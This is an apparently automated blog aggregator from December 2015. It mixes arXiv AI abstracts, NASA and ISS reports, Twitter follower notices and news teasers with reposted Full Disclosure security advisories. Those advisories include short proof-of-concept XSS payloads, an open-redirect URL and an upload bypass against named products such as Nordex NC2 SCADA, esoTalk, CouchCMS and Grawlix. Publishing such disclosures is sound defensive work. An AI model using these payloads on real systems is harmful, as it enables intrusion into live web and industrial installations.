Latest YouTube Video

Saturday, December 26, 2015

Chaconne in A major, Schrank II/38/38 (Anonymous)

Free public domain sheet music from IMSLP / Petrucci Music Library. (Redirected from Chaconne in A major Schrank II/38/38 (Anonymous)). Jump to: ...

from Google Alert - anonymous http://ift.tt/1ZuwyA2
via IFTTT

1 Today 14:22:29

http://ift.tt/fvZjIzanonymous/fdc03b17f54a7e9c25eb. http://ift.tt/fvZjIzanonymous/fdc03b17f54a7e9c25eb. Online. Pages: 1. Forum; » ...

from Google Alert - anonymous http://ift.tt/1OeRQOf
via IFTTT

I have a new follower on Twitter


Hans-Christian Preym
Co-founder of https://t.co/njQbUbrRgI Country manager at Ebbon-Dacs Deutschland GmbH and owner/MD of Universal Business Development GmbH
Salzburg Area | Austria

Following: 767 - Followers: 1124

December 26, 2015 at 05:03AM via Twitter http://twitter.com/HCPreymann

Friday, December 25, 2015

I have a new follower on Twitter


OMI
We assist businesses in engaging clients across Customer Lifecycles. #Marketing #Sales #CRM
Atlanta, GA
http://t.co/tYZMwofOLH
Following: 4508 - Followers: 5261

December 25, 2015 at 05:46AM via Twitter http://twitter.com/OMI4U

I have a new follower on Twitter


Big Cloud
Big thinking recruiters, specialising in Big Data, Data Science & Machine Learning. #BigData #DataScience #MachineLearning #InternetofThings #Analytics
World via Manchester
https://t.co/d1QRXoiGaM
Following: 2415 - Followers: 6166

December 25, 2015 at 05:31AM via Twitter http://twitter.com/BigCloudTeam

Star Colors and Pinyon Pine


Beautiful, luminous decorations on this pinyon pine tree are actually bright stars in the constellation Scorpius and the faint glow of the central Milky Way. Captured in June from the north rim of the Grand Canyon of planet Earth, the shallow, close focus image has rendered pine needles on the tree branch sharp, but blurred the distant stars, their light smeared into remarkably colorful disks. Of course, temperature determines the color of a star. Most of the out-of-focus bright stars of Scorpius show a predominately blue hue, their surface temperatures much hotter than the Sun's. Cooler and larger than the Sun, and noticably redder on the scene, is giant star Antares at the heart of the scorpion. In focused, telescopic views the whitish disk at the upper right would be immediately recognizable though, reflecting the Sun's light as ringed gas giant Saturn. via NASA http://ift.tt/1OpIO30

Thursday, December 24, 2015

Representation and Coding of Signal Geometry. (arXiv:1512.07636v1 [cs.IT])

Approaches to signal representation and coding theory have traditionally focused on how to best represent signals using parsimonious representations that incur the lowest possible distortion. Classical examples include linear and non-linear approximations, sparse representations, and rate-distortion theory. Very often, however, the goal of processing is to extract specific information from the signal, and the distortion should be measured on the extracted information. The corresponding representation should, therefore, represent that information as parsimoniously as possible, without necessarily accurately representing the signal itself.

In this paper, we examine the problem of encoding signals such that sufficient information is preserved about their pairwise distances and their inner products. For that goal, we consider randomized embeddings as an encoding mechanism and provide a framework to analyze their performance. We also demonstrate that it is possible to design the embedding such that it represents different ranges of distances with different precision. These embeddings also allow the computation of kernel inner products with control on their inner product-preserving properties. Our results provide a broad framework to design and analyze embeddins, and generalize existing results in this area, such as random Fourier kernels and universal embeddings.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1QL8ebM
via IFTTT

The Max $K$-Armed Bandit: PAC Lower Bounds and Efficient Algorithms. (arXiv:1512.07650v1 [stat.ML])

We consider the Max $K$-Armed Bandit problem, where a learning agent is faced with several stochastic arms, each a source of i.i.d. rewards of unknown distribution. At each time step the agent chooses an arm, and observes the reward of the obtained sample. Each sample is considered here as a separate item with the reward designating its value, and the goal is to find an item with the highest possible value. Our basic assumption is a known lower bound on the {\em tail function} of the reward distributions. Under the PAC framework, we provide a lower bound on the sample complexity of any $(\epsilon,\delta)$-correct algorithm, and propose an algorithm that attains this bound up to logarithmic factors. We analyze the robustness of the proposed algorithm and in addition, we compare the performance of this algorithm to the variant in which the arms are not distinguishable by the agent and are chosen randomly at each stage. Interestingly, when the maximal rewards of the arms happen to be similar, the latter approach may provide better performance.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1mhYOal
via IFTTT

Reinforcement Learning in Large Discrete Action Spaces. (arXiv:1512.07679v1 [cs.AI])

Being able to reason in an environment with a large number of discrete actions is essential to bringing reinforcement learning to a larger class of problems. Recommender systems, industrial plants and language models are only some of the many real-world tasks involving large numbers of discrete actions for which current methods can be difficult or even impossible to apply.

An ability to generalize over the set of actions as well as sub-linear complexity relative to the size of the set are both necessary to handle such tasks. Current approaches are not able to provide both of these, which motivates the work in this paper. Our proposed approach leverages prior information about the actions to embed them in a continuous space upon which it can generalize. Additionally, approximate nearest-neighbor methods allow for logarithmic-time lookup complexity relative to the number of actions, which is necessary for time-wise tractable training. This combined approach allows reinforcement learning methods to be applied to large-scale learning problems previously intractable with current methods. We demonstrate our algorithm's abilities on a series of tasks having up to one million actions.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1kj4RtV
via IFTTT

Measuring pattern retention in anonymized data -- where one measure is not enough. (arXiv:1512.07721v1 [cs.AI])

In this paper, we explore how modifying data to preserve privacy affects the quality of the patterns discoverable in the data. For any analysis of modified data to be worth doing, the data must be as close to the original as possible. Therein lies a problem -- how does one make sure that modified data still contains the information it had before modification? This question is not the same as asking if an accurate classifier can be built from the modified data. Often in the literature, the prediction accuracy of a classifier made from modified (anonymized) data is used as evidence that the data is similar to the original. We demonstrate that this is not the case, and we propose a new methodology for measuring the retention of the patterns that existed in the original data. We then use our methodology to design three measures that can be easily implemented, each measuring aspects of the data that no pre-existing techniques can measure. These measures do not negate the usefulness of prediction accuracy or other measures -- they are complementary to them, and support our argument that one measure is almost never enough.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1QL8bwA
via IFTTT

RDF2Rules: Learning Rules from RDF Knowledge Bases by Mining Frequent Predicate Cycles. (arXiv:1512.07734v1 [cs.AI])

Recently, several large-scale RDF knowledge bases have been built and applied in many knowledge-based applications. To further increase the number of facts in RDF knowledge bases, logic rules can be used to predict new facts based on the existing ones. Therefore, how to automatically learn reliable rules from large-scale knowledge bases becomes increasingly important. In this paper, we propose a novel rule learning approach named RDF2Rules for RDF knowledge bases. RDF2Rules first mines frequent predicate cycles (FPCs), a kind of interesting frequent patterns in knowledge bases, and then generates rules from the mined FPCs. Because each FPC can produce multiple rules, and effective pruning strategy is used in the process of mining FPCs, RDF2Rules works very efficiently. Another advantage of RDF2Rules is that it uses the entity type information when generates and evaluates rules, which makes the learned rules more accurate. Experiments show that our approach outperforms the compared approach in terms of both efficiency and accuracy.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1YBirf2
via IFTTT

Distinguishing cause from effect using observational data: methods and benchmarks. (arXiv:1412.3773v3 [cs.LG] UPDATED)

The discovery of causal relationships from purely observational data is a fundamental problem in science. The most elementary form of such a causal discovery problem is to decide whether X causes Y or, alternatively, Y causes X, given joint observations of two variables X, Y. An example is to decide whether altitude causes temperature, or vice versa, given only joint measurements of both variables. Even under the simplifying assumptions of no confounding, no feedback loops, and no selection bias, such bivariate causal discovery problems are challenging. Nevertheless, several approaches for addressing those problems have been proposed in recent years. We review two families of such methods: Additive Noise Methods (ANM) and Information Geometric Causal Inference (IGCI). We present the benchmark CauseEffectPairs that consists of data for 100 different cause-effect pairs selected from 37 datasets from various domains (e.g., meteorology, biology, medicine, engineering, economy, etc.) and motivate our decisions regarding the "ground truth" causal directions of all pairs. We evaluate the performance of several bivariate causal discovery methods on these real-world benchmark data and in addition on artificially simulated data. Our empirical results on real-world data indicate that certain methods are indeed able to distinguish cause from effect using only purely observational data, although more benchmark data would be needed to obtain statistically significant conclusions. One of the best performing methods overall is the additive-noise method originally proposed by Hoyer et al. (2009), which obtains an accuracy of 63+-10 % and an AUC of 0.74+-0.05 on the real-world benchmark. As the main theoretical contribution of this work we prove the consistency of that method.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1BkdJ60
via IFTTT

The Information-theoretic and Algorithmic Approach to Human, Animal and Artificial Cognition. (arXiv:1501.04242v5 [cs.AI] UPDATED)

We survey concepts at the frontier of research connecting artificial, animal and human cognition to computation and information processing---from the Turing test to Searle's Chinese Room argument, from Integrated Information Theory to computational and algorithmic complexity. We start by arguing that passing the Turing test is a trivial computational problem and that its pragmatic difficulty sheds light on the computational nature of the human mind more than it does on the challenge of artificial intelligence. We then review our proposed algorithmic information-theoretic measures for quantifying and characterizing cognition in various forms. These are capable of accounting for known biases in human behavior, thus vindicating a computational algorithmic view of cognition as first suggested by Turing, but this time rooted in the concept of algorithmic probability, which in turn is based on computational universality while being independent of computational model, and which has the virtue of being predictive and testable as a model theory of cognitive behavior.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1yjpIlb
via IFTTT

Online Context-Dependent Clustering in Recommendations based on Exploration-Exploitation Algorithms. (arXiv:1502.03473v4 [cs.LG] UPDATED)

We investigate two context-dependent clustering techniques for content recommendation based on exploration-exploitation strategies in contextual multiarmed bandit settings. Our algorithms dynamically group users based on the items under consideration and, possibly, group items based on the similarity of the clusterings induced over the users. The resulting algorithm thus takes advantage of preference patterns in the data in a way akin to collaborative filtering methods. We provide an empirical analysis on extensive real-world datasets, showing scalability and increased prediction performance over state-of-the-art methods for clustering bandits. For one of the two algorithms we also give a regret analysis within a standard linear stochastic noise setting.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1Dn3PTW
via IFTTT

jobs from Anonymous

Anonymous. Chartered Building Contractor based in North London carrying out local authority repairs and maintenance for a number of main ...

from Google Alert - anonymous http://ift.tt/22qNDx1
via IFTTT

[FD] eWON sa Industrial router - Multiple Vulnerabilities

[FD] Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS

*Nordex NC2 XSS Vulnerability* *AFFECTED PRODUCTS* Nordex Control 2 (NC2) SCADA V16 and prior versions. Nordex is a company based in Germany that maintains offices in countries around the world. The affected product, Nordex Control 2, is a web-based SCADA system for wind power plants. According to Nordex, NC2 is deployed across the Energy sector. Nordex estimates that this product is used primarily in the United States, Europe, and China. *CVE-ID* CVE-2015-6477 *Reference* http://ift.tt/1PdZkSQ *Vulnerable parameter* username *PoC* POST /login HTTP/1.1 connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en

Source: Gmail -> IFTTT-> Blogger

[FD] XZERES 442SR Wind Turbine XSS

ISS Daily Summary Report – 12/23/15

62 Progress (62P) Docking:  62P completed its 34 orbit rendezvous with ISS and successfully docked to Docking Compartment (DC)-1 at 4:27 AM CST.  After docking, Volkov successfully performed leak checks and subsequently opened the hatches.   Biochemical Profile and Cardio Ox:  Peake has performed his Flight Day 15 session blood and urine collections for the Biochem Profile and Cardio Ox investigations.  The Biochemical Profile experiment tests blood and urine samples obtained from astronauts before, during, and after spaceflight. Specific proteins and chemicals in the samples are used as biomarkers, or indicators of health. Post-flight analysis yields a database of samples and test results, which scientists can use to study the effects of spaceflight on the body.  The objective of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts.   Ocular Health:  Kelly and Kornienko completed Optical Coherence Tomography (OCT) testing and Kelly performed a fundoscopy activity in support of the Ocular Health investigation.  OCT is used to measure retinal thickness, volume, and retinal nerve fiber layer, and the fundoscope is used to obtain images of the retinal surface.  The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.   Extravehicular Mobility Unit Loop Scrub:  Kopra configured Extravehicular Mobility Unit (EMU) suits 3010 and 3011 for loop scrubbing.  Once the scrubbing activity was complete, he reconfigured hardware in order to perform Iodination of Ion Filters for both suits.  Samples containing 250 mL of the water were obtained after the loop scrub activity to determine the effectiveness of the filtering.  10 mL of this water sample were used for a conductivity test onboard ISS and the remaining water will be sent to the ground for chemical analysis.   Spare Sequential Shunt Unit (SSU) Checkout:  Peake configured the port Maintenance Work Area (MWA) within Node 2 and connected power and data cables onto a spare SSU.  Once cables were connected, power was applied to the SSU and a ground led checkout was successfully performed to ensure valid operations of the SSU’s firmware.  The checkout confirmed no health flags and associated refreshes were completed.  The SSU has been declared GO to replace SSU 1B during an Extravehicular Activity (EVA) planned for January 15th.  The currently installed SSU had experienced an anomaly last month on November 13th.   Today’s Planned Activities All activities were completed unless otherwise noted. HRF Urine Sample Collection SLEEP Questionnaire Closing USOS Window Shutters HRF – Sample MELFI Insertion Activation/Deactivation of MPEG2 Multicast TV Data Monitoring Closing window 6,8,9,12,13,14 shutters OCT Hardware Setup Eye Examination, Subject Eye Examination, Operator VIBROLAB. Monitoring hardware activation Preparation for ТКГ 431 Docking HRF – Review Big Picture Words WHC – Full Fill Replacement of MSPR-ELT Laptop ТКГ 431 Docking to DC1 WRS Water Sample Analysis High Definition Video Camera Assembly (HD-VCA) Remove & Replace WRS – Recycle Tank Fill from EDV СОЖ Maintenance Activation of TV data and MPEG2 Multicast Controls VEG-01 Fan Speed Change ТКГ 431 Docking to DC1 Crew time for ISS adaptation and orientation WHC Fill On MCC Go Activation of MPEG2 Multicast Recording Mode on CP SSC ТКГ 431 Docking to DC1 Video Footage for Nauka 2.0 TV Channel Closing Applications and Downlink of MPEG2 Multicast Video via OCA HRF Urine Sample Collection HRF – Sample MELFI Insertion Food Frequency Questionnaire Start EMU cooling loop scrub On MCC Go ТКГ 431 and DC1 Interface Leak Check On-orbit hearing assessment using EARQ Crew time for ISS adaptation and orientation HRF Urine Sample Collection ARED Flywheel Cylinder Evacuation HRF – Sample MELFI Insertion Optical Coherence Tomography (OCT) – Eye Exam DC1-СУ Hatch Opening On MCC Go Opening of ТКГ-СУ Transfer Hatch OCT Hardware Stowage IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop HRF – Hardware Setup Installation of Quick Release Screw Clamps (ЗВБ) on DC1-Progress 431 Interface Sequential Shunt Unit (SSU) Setup from the Spares Kit WRS – Recycle Tank Fill from EDV ТКГ 431 (DC1) deactivation, air duct installation ТКГ 431 (DC1) Air Sampling using АК-1М sampler Assistance in Sequential Shunt Unit (SSU) Test Initiate EMU Cooling Loop Scrub Part 1 Photo of a scuffmark left by the Active Docking Mechanism Probe on DC1 АСП Receiving Cone after Progress 431 Docking Start EMU cooling loop scrub Downlink Docking Cone Internal Surface Photos and Data via OCA ТКГ 431 (DC1) Early Unstow and US Cargo Items Transfers and IMS Ops EMU – Conductivity Test Crew time for ISS adaptation and orientation Terminate METOX Regeneration VIBROLAB. Copy and Downlink Data ТКГ 431 (DC1) Early Unstow and US Cargo Items Transfers and IMS Ops EMU Boot Inspection TOCA Data Recording Environmental Control and Life Support (ECL) Battery Removal Fundoscope Setup for exam MARROW – Sample Processing EMU – Cooling Loop Maintenance – EMU Reconfig Fundoscope – Vision Test Fundoscope – Eye Exam CONTENT. Experiment Ops INTERACTION-2. Experiment Ops EMU – Long Dryout Equipment stowage after Fundoscope Eye Imaging HRF Urine Sample Collection Evening Work Prep HRF – Sample MELFI Insertion HRF – Review Big Picture Words URISYS Hardware Setup ISS HAM – Activation of ISS HAM Radio and Video In-flight Maintenance (IFM).  Disconnecting Sequential Shunt Unit (SSU) from UOP Stow Syringes used in Н2О Conductivity Test IMS Delta File Prep Installation of inserts to ease opening of SM interior panel locks (Unstow Элементы конструкции (Structural Elements) kit (004890R), ФГБ1ПГО_4_427_1, СТВ No.1112 (004106J) Preparation of Reports for Roscosmos Web Site and Social Media ECON-M. Observation and Photography URAGAN Observations and Photography Video Recording for All-Russia State Television and Radio Broadcasting Company (ВГТРК)   Completed Task List Items EVA-SEMU Launch Enclosure Deltas Training   Ground Activities All activities were completed […]

from ISS On-Orbit Status Report http://ift.tt/1QYQdFh
via IFTTT

Want WhatsApp Free Video Calling? This Leaked Screenshot Reveals Upcoming Feature

Raise your hands if you want Free Video Calling feature in WhatsApp. I am in, and I think most of you people. And the good news is that it looks like WhatsApp's much-awaited Free Video Calling feature is on its way, according to the recently leaked screenshots. <!-- adsense --> Free Video Calling Feature in WhatsApp German technology blog Macerkopf.de has posted what it claims are


from The Hacker News http://ift.tt/1NE1kRu
via IFTTT

India temporarily Bans Facebook's Free Internet Service

Facebook's Free Internet access to India has hit a hurdle: The Telecom Regulatory Authority of India (TRAI) has ordered the mobile carrier to temporary suspend the Facebook's Free Basics Internet program. Facebook's Free Basics is an app that allows users to access certain Internet websites, including Facebook, for free. However, India's independent regulatory body has asked


from The Hacker News http://ift.tt/1m7llY7
via IFTTT

Ocean City, MD's surf is at least 6.53ft high

Maryland-Delaware, December 29, 2015 at 02:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 6.53ft. At 8:00 AM, surf min of 5.42ft. At 2:00 PM, surf min of 4.12ft. At 8:00 PM, surf min of 3.2ft.

Surf maximum: 7.53ft (2.3m)
Surf minimum: 6.53ft (1.99m)
Tide height: 0.45ft (0.14m)
Wind direction: E
Wind speed: 20.51 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Hyatt Hotel Says Payment Systems Hacked with Credit-Card Stealing Malware

Hyatt Hotels Corporation is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on the computers that process customer payments. "We recently identified malware on computers that operate the payment processing systems for Hyatt-managed locations," the company announced on Wednesday. "As soon as we discovered the


from The Hacker News http://ift.tt/1YzEvqH
via IFTTT

Geminid Meteors over Xinglong Observatory


Where do Geminid meteors come from? In terms of location on the sky, as the featured image composite beautifully demonstrates, the sand-sized bits of rock that create the streaks of the Geminid Meteor Shower appear to flow out from the constellation of Gemini. In terms of parent body, Solar System trajectories point to the asteroid 3200 Phaethon -- but this results in a bit of a mystery since that unusual object appears mostly dormant. Perhaps, 3200 Phaethon undergoes greater dust-liberating events than we know, but even if so, exactly what happens and why remains a riddle. Peaking last week, over 50 meteors including a bright fireball were captured streaking above Xinglong Observatory in China. Since the Geminids of December are one of the most predictable and active meteor showers, investigations into details of its origin are likely to continue. via NASA http://ift.tt/1RGdL3e

Wednesday, December 23, 2015

Re: [FD] Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

Two Denton Churches Receive Anonymous Threats

Two different churches, two anonymous letters and one chilling message: Stop Christmas Eve services or your churches will be bombed.

from Google Alert - anonymous http://ift.tt/1OoRZ3A
via IFTTT

The ERA of FOLE: Foundation. (arXiv:1512.07430v1 [cs.DB])

This paper discusses the representation of ontologies in the first-order logical environment FOLE (Kent 2013). An ontology defines the primitives with which to model the knowledge resources for a community of discourse (Gruber 2009). These primitives, consisting of classes, relationships and properties, are represented by the entity-relationship-attribute ERA data model (Chen 1976). An ontology uses formal axioms to constrain the interpretation of these primitives. In short, an ontology specifies a logical theory. This paper is the first in a series of three papers that provide a rigorous mathematical representation for the ERA data model in particular, and ontologies in general, within the first-order logical environment FOLE. The first two papers show how FOLE represents the formalism and semantics of (many-sorted) first-order logic in a classification form corresponding to ideas discussed in the Information Flow Framework (IFF). In particular, this first paper provides a foundation that connects elements of the ERA data model with components of the first-order logical environment FOLE, and the second paper provides a superstructure that extends FOLE to the formalisms of first-order logic. The third paper defines an interpretation of FOLE in terms of the transformational passage, first described in (Kent 2013), from the classification form of first-order logic to an equivalent interpretation form, thereby defining the formalism and semantics of first-order logical/relational database systems (Kent 2011). The FOLE representation follows a conceptual structures approach, that is completely compatible with formal concept analysis (Ganter and Wille 1999) and information flow (Barwise and Seligman 1997).

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1U5Ns4c
via IFTTT

Selecting the top-quality item through crowd scoring. (arXiv:1512.07487v1 [cs.AI])

We investigate crowdsourcing algorithms for finding the top-quality item within a large collection of objects with unknown intrinsic quality values. This is an important problem with many relevant applications, for example in networked recommendation systems. The core of the algorithms is that objects are distributed to crowd workers, who return a noisy evaluation. All received evaluations are then combined, to identify the top-quality object. We first present a simple probabilistic model for the system under investigation. Then, we devise and study a class of efficient adaptive algorithms to assign in an effective way objects to workers. We compare the performance of several algorithms, which correspond to different choices of the design parameters/metrics. We finally compare our approach based on scoring object qualities against traditional proposals based on comparisons and tournaments.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1U5Nqta
via IFTTT

Randomized Social Choice Functions Under Metric Preferences. (arXiv:1512.07590v1 [cs.AI])

We determine the quality of randomized social choice mechanisms in a setting in which the agents have metric preferences: every agent has a cost for each alternative, and these costs form a metric. We assume that these costs are unknown to the mechanisms (and possibly even to the agents themselves), which means we cannot simply select the optimal alternative, i.e. the alternative that minimizes the total agent cost (or median agent cost). However, we do assume that the agents know their ordinal preferences that are induced by the metric space. We examine randomized social choice functions that require only this ordinal information and select an alternative that is good in expectation with respect to the costs from the metric. To quantify how good a randomized social choice function is, we bound the distortion, which is the worst-case ratio between expected cost of the alternative selected and the cost of the optimal alternative. We provide new distortion bounds for a variety of randomized mechanisms, for both general metrics and for important special cases. Our results show a sizable improvement in distortion over deterministic mechanisms.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1NMDX68
via IFTTT

Putting Things in Context: Community-specific Embedding Projections for Sentiment Analysis. (arXiv:1511.06052v2 [cs.CL] UPDATED)

Variation in language is ubiquitous, and is particularly evident in newer forms of writing such as social media. Fortunately, variation is not random, but is usually linked to social factors. By exploiting linguistic homophily --- the tendency of socially linked individuals to use language similarly --- it is possible to build models that are more robust to variation. In this paper, we focus on social network communities, which make it possible to generalize sociolinguistic properties from authors in the training set to authors in the test sets, without requiring demographic author metadata. We detect communities via standard graph clustering algorithms, and then exploit these communities by learning community-specific projections of word embeddings. These projections capture shifts in word meaning in different social groups; by modeling them, we are able to improve the overall accuracy of Twitter sentiment analysis by a significant margin over competitive prior work.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1kJ97UX
via IFTTT

Re: [FD] Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

Anonymous donor leaves check for $50000 at nativity scene

Donor says he was inspired by the children helped at Texas center.

from Google Alert - anonymous http://ift.tt/1IrFgLa
via IFTTT

Hacking group Anonymous declares 'cyber war' on Turkey for

HACKING group Anonymous has declared war on Turkey after accusing the country of “supporting” ISIS. CYBER WAR: Anonymous has declared war ...

from Google Alert - anonymous http://ift.tt/1JvQWYn
via IFTTT

Dirtyphonics

Stream Dirtyphonics - Anonymous VIP by Dirtyphonics from desktop or your mobile device.

from Google Alert - anonymous http://ift.tt/1RHcpFn
via IFTTT

I have a new follower on Twitter


Daniel Barth-Jones
#HIPAA Health Data #Privacy De-identification, HIV/Inf Dis/Computnl/Digital Epidemiology, Vaccinology, #DataScience, #BigData, #GIS, UrbanScience, Public Policy
Columbia University, NYC
http://t.co/rBga3M1HPc
Following: 6445 - Followers: 5890

December 23, 2015 at 01:36PM via Twitter http://twitter.com/dbarthjones

Re: [FD] Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

[FD] esoTalk 1.0.0g4: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: esoTalk 1.0.0g4 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: toby@esotalk.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description esoTalk is a light-weight forum software written in PHP. In version 1.0.0g4 and possibly prior versions, there is a reflected XSS vulnerability in the search because a given URL is echoed unencoded in multiple places. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Proof of Concept http://localhost/esoTalk-1.0.0g4/conversations/a'">?search=test 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: http://ift.tt/1PknJUw

Source: Gmail -> IFTTT-> Blogger

[FD] CouchCMS 1.4.5: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: CouchCMS 1.4.5 Fixed in: 1.4.7 Fixed Version Link: http://ift.tt/1Psz3AY Vendor Website: http://ift.tt/RkwNdm Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C Description When uploading a file, the file extension is checked against a blacklist. This blacklist misses at the least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction. Admin credentials are required to upload files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9. 3. Proof of Concept POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] CouchCMS 1.4.5: XSS & Open Redirect

Security Advisory - Curesec Research Team 1. Introduction Affected Product: CouchCMS 1.4.5 Fixed in: 1.4.7 Fixed Version Link: http://ift.tt/1Psz3AY Vendor Website: http://ift.tt/RkwNdm Vulnerability Type: XSS & Open Redirect Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description CouchCMS 1.4.5 contains two reflected XSS and one open redirect vulnerability. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Details XSS 1 When displaying a post, the name of any additional GET parameters is echoed unencoded, leading to XSS. Proof of Concept: http://localhost/CouchCMS-1.4.5/blog.php?p=5&foo">bar=1 Code: function getPaginationString( $page = 1, $totalitems, $limit = 15, $adjacents = 1, $targetpage = "/", $pagestring = "?page=", $prev_text, $next_text, $simple ){ [...] $pagination .= "$counter";\ [...] $pagination .= "$counter"; [...] $pagination .= "$lpm1"; $pagination .= "$lastpage"; [... (all $targetpage . $pagestring are affected) ...] } XSS 2 When displaying comments, the name of any additional GET parameters is echoed unencoded, leading to XSS. Proof of Concept: http://localhost/CouchCMS-1.4.5/couch/?o=comments&foo">bar=1 Code: /couch/edit-comments.php [...]

| t('view'); ?> | t('edit'); ?> | t('delete'); ?>

Open Redirect The filter which checks if a user supplied redirect value leads to external pages can be bypassed by an attacker. Proof of Concept (Only works for logged in victims or after login): http://localhost/CouchCMS-1.4.5/couch/login.php?redirect=//google.com Code: /couch/auth/auth.php function redirect( $dest ){ global $FUNCS, $DB; // sanity checks $dest = $FUNCS->sanitize_url( trim($dest) ); if( !strlen($dest) ){ $dest = ( $this->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL : K_ADMIN_URL . K_ADMIN_PAGE; } elseif( strpos(strtolower($dest), 'http')===0 ){ if( strpos($dest, K_SITE_URL)!==0 ){ // we don't allow redirects external to our site $dest = K_SITE_URL; } } $DB->commit( 1 ); header( "Location: ".$dest ); die(); } 4. Solution To mitigate this issue please upgrade at least to version 1.4.7: http://ift.tt/1Psz3AY Please note that a newer version might already be available. 5. Report Timeline 11/17/2015 Informed Vendor about Issue 11/18/2015 Vendor sends fixes for confirmation 11/20/2015 Verified fixes 11/24/2015 Vendor releases fix 12/21/2015 Disclosed to public Blog Reference: http://ift.tt/1JuUfic

Source: Gmail -> IFTTT-> Blogger

[FD] Grawlix 1.0.3: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Grawlix 1.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1Yxrde6 Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description Grawlix is a CMS for publishing comics, which is written in PHP. When uploading an image icon for a link, neither the file type nor the file extension are checked, leading to code execution. It should be noted that admin credentials are required to upload an icon, and that because of a bug when uploading icons, the upload only works if Grawlix is installed in the root directory. 3. Proof of Concept

[FD] Grawlix 1.0.3: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Grawlix 1.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1Yxrde6 Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. An attacker can for example change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area. 3. Proof of Concept Change admin password:
4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: http://ift.tt/1NCqXSQ

Source: Gmail -> IFTTT-> Blogger

[FD] Grawlix 1.0.3: XSS

